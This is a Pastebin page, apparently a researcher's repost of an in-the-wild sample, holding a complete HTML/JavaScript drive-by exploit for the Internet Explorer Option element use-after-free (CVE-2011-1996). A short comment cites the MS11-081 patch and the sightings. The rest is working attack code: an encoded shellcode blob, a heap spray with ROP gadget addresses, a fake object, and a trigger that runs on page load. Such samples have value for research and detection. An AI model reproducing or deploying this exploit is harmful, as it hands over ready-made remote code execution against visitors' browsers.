daily pastebin goal
73%
SHARE
TWEET

Internet Explorer Option Element Use-After - CVE-2011-1996

eromang Dec 27th, 2012 1,064 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--
  2. http://eromang.zataz.com
  3.  
  4. Option Element Use-After-Free - CVE-2011-1996
  5.  
  6. Patched in MS11-081 the 11 October 2011
  7. http://technet.microsoft.com/en-us/security/bulletin/ms11-081
  8.  
  9. Found exploited in the wild through CLEAN MX evidences of 2011-10-25
  10. http://support.clean-mx.de/clean-mx/view_evidence?id=1058155&table=viruses
  11. http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=98.126.99.147
  12.  
  13. hb7.in first seen on MALWARE.pl & on jsunpack the 2012-10-24
  14. http://www.malware.pl/report/hb7.in
  15. http://jsunpack.jeek.org/dec/go?report=6a08f0dcd328c71c09beec65da5adc90f1f08cf4
  16. -->
  17.  
  18. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  19. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" id="doctype1">
  20. <html>
  21. <head>
  22. <script type="text/javascript">
  23.  
  24. function int_to_hex(dword)
  25. {
  26.         var d=Number(dword).toString (16);
  27.         while(d.length<8) d='0'+d;
  28.         return unescape('%u'+d.substr(4,8)+'%u'+d.substr(0,4));
  29. };
  30.  
  31. spraybase = 0x0a0a0024;
  32.  
  33. var shellcode = unescape("%u9090%u9090%ucbb5%u7852%u9090%u9090%u11eb%u"+"4a5a%uc933%u8166%uE3c1%u8007%u0a34%ue296%uebfa%ue805%uffea%uffff%u7ef6%u9696%u9696%u17cb%u857b%ud686%u1d96%u1b63%uc310%ud683%uc696%ud67e%u9692%u1b96%ud010%ud683%uc696%ua27e%u9692%u1b96%u3010%ud683%uc696%ube7e%u9692%u1b96%u5910%ud683%uc696%u8a7e%u9692%uc096%u97fc%u3b7e%u9694%uc096%u94fc%u337e%u9694%uc096%u95fc%u0b7e%u9694%uc096%u92fc%u037e%u9694%uc096%uac7e%u9697%ufc96%u6996%ue800%ud683%uf796%uc355%u7a1d%u5215%u1d6a%u9ed3%ud31f%ua56a%ucf56%uaf16%ue296%ud692%u7dd7%u5f61%u9254%uc396%u7a1d%ue369%u7e9e%u694f%u6969%ud397%u1d9e%u9ae3%ueb1d%u699e%u9ae3%u5e7e%u6969%u1d69%u155e%u9757%u3265%u545f%u969e%u1dc3%uc17a%ueb1d%u139e%ue269%u1dbe%u9ac3%u4413%ub7e2%u1dc0%u86e3%u501d%u13d8%u1d56%ue059%ubd9a%ud041%u921c%u1e87%ud797%ue3d8%u1d61%uc851%u5fc9%u9a54%ua596%uc956%u545f%u969a%u1dc3%u1d7a%u9ee3%u101b%u8100%u96d6%u69c6%u1c00%ud683%ufc96%uc6f3%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u6252%ue31d%uf69e%ucb1b%uc56a%ud6fc%uf2fc%u101d%u83db%u96d6%u69c6%u1000%ud683%uf796%u101d%u83db%u96d6%ud31f%u1d62%u9350%u8709%u96d6%ud3bd%u1562%u937e%ud31f%uf66e%u97fc%u081b%u8193%u96d6%u1dc5%udb10%ud683%uc696%uc37e%u6969%uf769%ufcf6%u1b92%u6ed3%u1dc6%udb10%ud683%u1596%u9756%u7ec6%u69a8%u6969%u1bf7%ue810%ud683%ufc96%uc692%u092e%ud687%u9596%u1550%u9556%u7ec6%u69b2%u6969%u545f%u9692%u96fc%u962e%u9696%u6996%u5f46%u9254%uc396%u7a1d%u5215%u1d7a%u9ee3%u92fe%u9697%ufc96%u69d6%u1400%ud683%u1f96%u6ad3%ufec6%u9792%u9696%u0069%u83ec%u96d6%u1bf6%u1a08%ud681%uc596%ue369%u7e6a%u6821%u6969%u69f7%u6ae3%u0069%u83c8%u96d6%u96fc%u96fc%ue369%u1b6a%ub908%ud683%uc596%u96fc%u0069%u8340%u96d6%u569d%u1399%u9662%u9696%u96fc%u96fc%u95fc%u96fc%u95fc%u95fc%ue369%u696a%uf000%ud683%u1f96%u6ed3%ueb15%u966e%u1299%u9644%u9696%u96fc%ue369%u696e%uf400%ud683%u1f96%u62d3%ueb17%uf662%u967c%u9996%u2110%u9696%u1796%u62eb%uc906%u9697%u1599%u963c%u9696%ue369%ufc62%u69d6%u1400%ud683%u1f96%u66d3%ud351%u967a%u9696%ufc96%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83f8%u96d6%u569d%ueae2%u1df6%u62db%ud31d%u1c66%u1686%ub254%u6416%u1e4a%ud686%ue3df%uf764%u96fc%u96fc%u96fc%ue369%u696e%u0000%ud683%u1596%u696e%uc4e2%u96fc%ud351%u967a%u9696%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83e4%u96d6%u569d%ua4e2%ue369%u696e%ufc00%ud683%ufe96%u9146%u9696%u0069%u8304%u96d6%ue369%u696a%u1c00%ud683%u1596%u966e%u71e2%u081b%u8134%u96d6%uc6c5%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u4652%ue31d%ufe9a%u9792%u9696%ud6fc%u0069%u8314%u96d6%ud31f%u1b6a%u6ed3%ufec6%u968f%u9694%u96fc%ueb15%u979e%u90e3%u101b%u8348%u96d6%ueb15%u949e%u90e3%u101b%u8361%u96d6%ueb15%u959e%u90e3%u101b%u8081%u96d6%ueb15%u929e%u90e3%u101b%u80a9%u96d6%ufec6%u9694%u1696%u0069%u8339%u96d6%ueb15%u979e%u90e2%ueb15%u949e%u93e3%u1e7f%u9696%u1596%u9eeb%ue395%u9db4%ue356%ufc88%u1b96%uc108%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81e4%u96d6%u69c5%ue000%ud683%u1596%u9eeb%ue392%u9dc0%ue356%ufec4%u96a9%u9699%u96fc%u96fc%u0069%u832d%u96d6%u569d%ua9e2%ub2fc%u081b%u819a%u96d6%uc6c5%u0069%u8329%u96d6%u569d%ubde2%ucb1b%uc546%u97fc%u69c6%u5500%ud683%ufc96%u1b96%ub308%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81a9%u96d6%u69c5%ue000%ud683%u5f96%u9e54%u9d96%ue256%u5f90%u9e54%u7d96%u15f2%u9eeb%ue397%u1b90%uce08%ud680%u1596%u9eeb%ue394%u1b90%u3a08%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u1596%u9eeb%ue397%u1b90%u0708%ud680%u1596%u9eeb%ue394%u1b90%u7208%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u5f96%u9e54%uf696%ue21d%ub2b2%u017e%u9696%ufe96%u473b%ud7a2%u7ec6%u96b7%u9696%u69c0%u1d46%ubd4e%u3a56%u5612%u6de3%u681d%u133b%ue256%uc69c%u7ec5%u9691%u9696%u7d3d%uf767%u9254%uf696%ufa1d%ub2b2%ud31d%u1daa%ubec2%u95ee%u1d43%u8edc%ucc1d%u95b6%u754b%udfdf%ua21d%u951d%ua563%uf669%u401d%u56a5%u4661%u94a4%u9e25%u7e47%u93e5%ub6a3%u2e15%u687b%ue35d%u1665%u96ac%u95e2%u7dd4%u6171%u1f46%ub292%uadf7%ub2ea%ue3be%u1d5c%ub2cc%u4b95%u1df0%udd9a%ucc1d%u958a%u1d4b%u1d92%u5395%u947d%u56bd%ud21f%u8ab2%u54f7%u969e%ua5f6%uf256%ud61d%u13a6%uee56%u1d9a%u9ad6%ue61d%u3b8a%ud61d%u7d9e%u1d9f%ua2d6%ud61b%u1dea%uaad6%ud21f%u8ab2%u55f7%ue2fe%ue6e2%ub9ac%u9bb9%uf4fe%ub8a1%uf8ff%uf8b9%ue5b9%uf3b8%uf3ee%ue396%uf3e5%ua5e4%u96a4%u2d94%uf3dd%u9696%u9696%uf3fd%uf8e4%ufaf3%ua4a5%u4896%ub3f9%u8d48%ueb17%u4979%u1fbb%u0b1a%uf4dc%uccfe%u4ef7%u05c2%ue1e1%ud9b7%ud3ba%u0bbe%ubc7f%u1745%u63e7%u55d6%u35c5%u2d15%u5542%u3bef%ua247%u89d7%u5fea%u2c69%u57a0%ud49c%u130b%uef13%ucf29%u3580%u8976%u9697%u9696%uf796%ue0f2%ue6f7%ua5ff%u96a4%uc00f%u5b8f%u9fad%u1e21%u9439%u128e%u3bfa%uddef%u68fc%ubaf7%u6960%u894c%uc391%u5288%u9696%u9696%ue4e3%ufbfa%uf8f9%u8f96%u5542%u9604%u9696%uc596%ud0d9%uc1c2%uc4d7%ucad3%ud7ca%uf8fe%uf7da%ucaf4%uc0ca%udaa5%ue2ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%ufed7%udaf8%uf4f7%ucaca%ua5c0%ua5b6%ua3a0%ud5b6%ufffa%ufff8%u96f5%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uded8%ub6d8%uf9d5%ue6e4%ue4f9%ue2f7%uf9ff%ucaf8%ud8ca%ue0f7%ue4f3%uf7c0%uf5f5%uf8ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uc5d3%ue5c2%uf0f9%ucae2%ud7ca%ucfda%uf5f7%ud196%uf9fa%uf7f4%ucafa%ua5c0%udfda%ud3c2%uedc9%ua5d7%ua6d7%ud3af%ua4d3%ua7bb%ua7d4%ubbd3%ua6a2%ua1a0%ud4bb%ua4a4%ubbd2%ua4a6%uafa0%ua2a7%ud4a0%ua6a7%ua6a6%uc9eb%udad7%u96da%ufad1%uf4f9%ufaf7%uc0ca%udaa5%uc2df%uc9d3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%ud7ed%ud7a5%uafa6%ud3d3%ubba4%ud4a7%ud3a7%ua2bb%ua0a6%ubba1%ua4d4%ud2a4%ua6bb%ua0a4%ua7af%ua0a2%ua7d4%ua6a6%ueba6%ud7c9%udada%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%u2e96%u9696%u9696%u9696%u067f%u0606%u0606%ud796%uda96%ucf96%uf796%uf596%uc996%uc696%ucc96%uc596%ue496%ue096%u9696%u9696%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%ucfd7%uf1d7%uf8f3%ub8e2%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%udad7%uf7cf%ub8f5%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%uc0d8%ud7d5%uf3f1%ue2f8%uf8b8%uf5e6%uf896%ue5e2%ub6f2%uf5bb%ue7b6%ubbb6%uf8e6%ud8b6%uf7e5%ue5e0%uf5e0%uf8b8%uf5e6%uc096%udac5%ueff7%uf2b8%ufafa%uc596%uf2fe%uf5f9%ue1e0%uf2b8%ufafa%uff96%ufff8%u96e2%uc5b2%uf3fe%ufafa%uf9d5%uf3f2%uc2c9%uf3fe%uf8d3%ub2f2%u3a2e%u9691%uc696%u967e%u9696%u6996%u96b3%ud6b6%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u96");
  34.  
  35. var heapspray =
  36. int_to_hex(0x785863F6)
  37. + int_to_hex(0x7854F203)
  38. + int_to_hex(0x7C7D1AD4)
  39. + int_to_hex(0x785863F6)
  40. + int_to_hex(0x78590ABC)
  41. + int_to_hex(spraybase)
  42. + int_to_hex(0x3000)
  43. + int_to_hex(0x40)
  44. + int_to_hex(spraybase)
  45. + int_to_hex(0x7854F203)
  46. + int_to_hex(0x0a0a0220)
  47. + int_to_hex(0x78590ABC)
  48. + '11'
  49. ;
  50.  
  51. heapspray += int_to_hex(spraybase + 0x1F8 +4);
  52.  
  53. while (heapspray.length < 0x1F8/2)
  54. {
  55.         heapspray += 'AA';
  56. }
  57.  
  58. heapspray += int_to_hex(0x63f0575b); // virtual function 63f0575b
  59.  
  60. heapspray += shellcode;
  61.  
  62. function build_block(s)
  63. {
  64.         var endtag = unescape("AA");
  65.  
  66.         var len = 0x10000 - (s.length *2 + endtag.length * 2);
  67.         var b = "11";
  68.         while(b.length < len) b += b;
  69.         var block = b.substring(0, len / 2);
  70.         block = s + block + endtag;
  71.  
  72.         var bigblock = "";
  73.         for (var i=0; i < 8; i++) bigblock += block;
  74.         bigblock = bigblock.substring(0, (0x80000-0x28)/2);
  75.        
  76.         return bigblock
  77. }
  78.  
  79.  
  80. bigblock = build_block(heapspray);
  81. var blocks = new Array();
  82. for(var i = 0; i < 2 * 200; i++)
  83.         blocks[i] = [bigblock].join("");
  84.  
  85. function exploit()
  86. {
  87.         var fakeobj = int_to_hex(spraybase) +
  88.         int_to_hex(0x0c0c0c0c) +
  89.         int_to_hex(0x63f01e13) +
  90.         int_to_hex(0x63F01100) +
  91.         int_to_hex(0x63f01ec4) +
  92.         int_to_hex(spraybase) +
  93.         int_to_hex(0x0c0c0c0c) +
  94.         int_to_hex(0x0c0c0c0c) +
  95.         int_to_hex(0x0c0c0c0c) +
  96.         int_to_hex(0x0c0c0c0c) +
  97.         int_to_hex(0x0c0c0c0c) +
  98.         int_to_hex(0x0c0c0c0c) +
  99.         unescape("%u0c0c%u3b3b") +
  100.         int_to_hex(0x0c0c0c0c) +
  101.         int_to_hex(0x0c0c0c0c) +
  102.         int_to_hex(0x0c0c0c0c) +
  103.         int_to_hex(0x0c0c0c0c) +
  104.         int_to_hex(0x0c0c0c0c) +
  105.         unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
  106.  
  107.         var formobj, selobj, optobj;
  108.         selobj = document.getElementById("select1");
  109.         formobj = selobj.form;
  110.  
  111.         var loopcount = 2;
  112.         bigarray = new Array();
  113.         for (var i=0; i<loopcount; i++)
  114.         {
  115.                 var imgarray = new Array();
  116.                 for(var j = 0; j < 500; j++) {
  117.                         imgarray.push(document.createElement("img"));
  118.                 }
  119.  
  120.                 bigarray.push(imgarray);
  121.         }
  122.  
  123.         for (var k=0; k<loopcount; k++)
  124.         {
  125.                 for(var i=0;i<5;i++) {
  126.                         optobj = document.createElement('option');
  127.                         optobj.text = "test";
  128.                         selobj.add(optobj);
  129.                 }
  130.  
  131.                 selobj.innerText = "foo";
  132.  
  133.                 for(var i = 0; i < bigarray[k].length; i++) {
  134.                         bigarray[k][i].title = fakeobj.substring(0, 0x38 / 2 - 1);
  135.                 }
  136.                  
  137.                 formobj.reset();
  138.         }
  139. alert('s');
  140. }
  141.  
  142. </script>
  143. </head>
  144.  
  145. <body onload='exploit()'>
  146. <form method="post">
  147.    <select id="select1">
  148. </select>
  149. </form>
  150. <object classid="vvv.dll#GenericControl">
  151. </body>
  152. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top